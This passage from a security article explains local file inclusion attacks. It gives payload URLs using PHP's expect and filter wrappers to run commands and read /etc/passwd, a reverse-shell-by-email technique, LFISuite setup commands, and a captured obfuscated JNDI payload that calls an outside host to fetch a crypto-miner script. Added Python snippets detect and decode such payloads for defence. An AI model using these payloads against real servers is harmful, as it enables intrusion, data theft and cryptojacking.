Picking locks with local file inclusion

Other LFI Attacks

There are several other ways of achieving local file inclusion. Look online for a nicely constructed cheat sheet [7].

For example, the expect wrapper in PHP [8] is a useful attack vector (note that it only exists when the PECL expect extension is installed, which is not the default in most PHP builds). Loosely written out, the format of an expect wrapper attack looks like the following:

index.php?page=expect://whoami

In this case, I'm running the whoami command through the expect wrapper.

PHP's php://filter wrapper can also be abused. It hands back a file's contents after running them through a filter instead of executing them, so base64-encoding the output lets an attacker read files (including PHP source) that the server would otherwise interpret. A URL might look like the following:

index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

There are several more examples in the cheat sheet link, but another one that piqued my interest is to email the target machine a reverse shell! Even if the mail server is not associated with DNS, but an SMTP service is dutifully listening, you can email nefarious data to the www-data user. The LFI part of the puzzle is then reading the internal email text file (for example /var/spool/mail/www-data), which would hold the reverse shell code.
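As an added example (not code from the article or from the cheat sheet it cites), the following Python scanner runs over a few constructed Apache-style access-log lines and flags the indicators discussed above: the expect and php://filter wrappers, ../ traversal (including double URL-encoding), and direct reads of /etc/passwd or the www-data mail spool. The log lines, IP addresses and file names are all constructed sample input.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not from the article), Apache-style format.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=expect://whoami HTTP/1.1" 500 0
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1120
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=/var/spool/mail/www-data HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Indicators the article walks through: the expect and filter wrappers,
# ../ traversal, and reads of /etc/passwd or the www-data mail spool.
INDICATORS = [
    ("expect-wrapper", re.compile(r"^expect://", re.I)),
    ("php-filter-wrapper", re.compile(r"^php://filter", re.I)),
    ("path-traversal", re.compile(r"(^|[/\\])\.\.([/\\]|$)")),
    ("sensitive-file", re.compile(r"/etc/passwd|/var/spool/mail/", re.I)),
]

def decode_param(value, rounds=3):
    """URL-decode repeatedly so double-encoded traversal (%252e%252e) is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_log(text):
    """Return (client_ip, parameter, indicator) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for name, values in query.items():
            for raw in values:  # parse_qs has already removed one encoding layer
                value = decode_param(raw)
                for label, pattern in INDICATORS:
                    if pattern.search(value):
                        findings.append((client_ip, name, label))
                        break  # one label per parameter value is enough
    return findings
```

Real traffic will need the indicator list tuned to the application (a legitimate `page=` value should never contain a scheme or a traversal sequence, so any hit is worth a look).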

If you are interested in automating the search for possible LFI targets, you could try the fantastic tool called LFISuite [9]. I needed to create a virtual environment in Python to get it running. The following commands worked for me, but you might need to tweak them and do a little bit of research in order to get them working. The commands are as follows (assuming you have installed pip):

$ git clone https://github.com/D35m0nd142/LFISuite.git
$ cd LFISuite
$ virtualenv -p /usr/bin/python2.7 env_name
$ . env_name/bin/activate
$ pip install requests # test the environment with the "pip" package manager
$ python lfisuite.py

Figure 2 shows the LFISuite, with some excellent ASCII art.

Figure 2: LFISuite starting up, with understated aplomb.

If you look at some of the options available (under the Exploiter menu option), you will see some familiar information, as shown in Figure 3.

Figure 3: Some old familiars in the Exploiter menu.

Although a little long in the tooth (the GitHub repository hasn't been updated for five years or so), the core of LFISuite is still extremely useful. I would recommend exercising a degree of patience and walking through the many options against a test machine. You will see lots of ../../../ URLs in the output, and you'll be able to gain confidence in the findings with some practice. Use the Auto-Hack option with a level of care, as you can imagine!

Conclusion

This article took a close look at local file inclusion attacks. Understanding how these attacks work will help you understand how to prepare for them.

One important warning about the techniques described in this article is that you need to be very careful when opening up network ports. During testing, I was momentarily distracted by the fact that my listener terminal filled up with text. At a glance, it looked like an attacker was looking for a Tomcat vulnerability. Listing 8 shows a heavily abbreviated snippet.

Listing 8

Tomcat Bypass

Authentication: ${jnd${123%25ff:-${123%25ff:-i:}}ldap://129.151.XXX.XXX:1389/TomcatBypass/Command/Base64/
Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1c
F9jM3Bvb2xfb?

With a bit of digging, I was able to extract the following URL: https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh. This looks like a crypto-mining installer script. See the GitHub site for the XMRig script if you are interested [10].

I mention this to remind you to be careful when opening up network ports!
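The "bit of digging" above can be scripted. As an added example (not the article's code), this Python snippet undoes the `${key:-default}` obfuscation seen in Listing 8, locates the Base64 segment of the JNDI payload, and decodes it to recover the callback host and any download URLs for blocking or threat-intel sharing. The sample header is constructed to match the listing's shape, with a placeholder callback address and a placeholder URL rather than the real ones.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample modelled on Listing 8: placeholder callback host and a
# placeholder download URL, not the article's real payload.
SAMPLE_HEADER = (
    "Authentication: ${jnd${123%25ff:-${123%25ff:-i:}}"
    "ldap://198.51.100.23:1389/TomcatBypass/Command/Base64/"
    + base64.b64encode(b"curl -s -L https://example.invalid/PLACEHOLDER_setup.sh").decode()
)

# A ${key:-default} lookup with no nested lookups left inside it.
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
PAYLOAD = re.compile(
    r"\$\{jndi:(ldaps?|rmi|dns)://([^/\s]+)/[^}\s]*?/Base64/([A-Za-z0-9+/=]+)"
)

def normalise(value):
    """Undo one layer of URL encoding, then collapse ${key:-default} lookups to
    their defaults from the inside out, which is how the obfuscation resolves."""
    value = unquote(value)
    while True:
        collapsed = DEFAULT_LOOKUP.sub(lambda m: m.group(1), value)
        if collapsed == value:
            return value
        value = collapsed

def extract_command(header_value):
    """Return the callback host, decoded command and any URLs in it, or None."""
    m = PAYLOAD.search(normalise(header_value))
    if not m:
        return None
    scheme, callback, blob = m.groups()
    if len(blob) % 4 == 1:          # a lone trailing character carries no full byte
        blob = blob[:-1]
    blob += "=" * (-len(blob) % 4)  # re-pad a truncated blob so it still decodes
    command = base64.b64decode(blob).decode("utf-8", "replace")
    return {
        "scheme": scheme,
        "callback": callback,
        "command": command,
        "urls": re.findall(r"https?://[^\s'\"|;&]+", command),
    }
```

The truncation handling matters because captured payloads are often cut off, as in the listing; the decodable prefix still usually contains the URL.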

I would be remiss not to give you some pointers about writing secure code to help mitigate the effects of some LFI threats. You'll find a relatively concise introduction at the Acunetix website [11]. Stay vigilant.

The Author

Chris Binnie is a Cloud Native Security consultant and co-author of the book Cloud Native Security: https://www.amazon.com/Cloud-Native-Security-Chris-Binnie/dp/1119782236
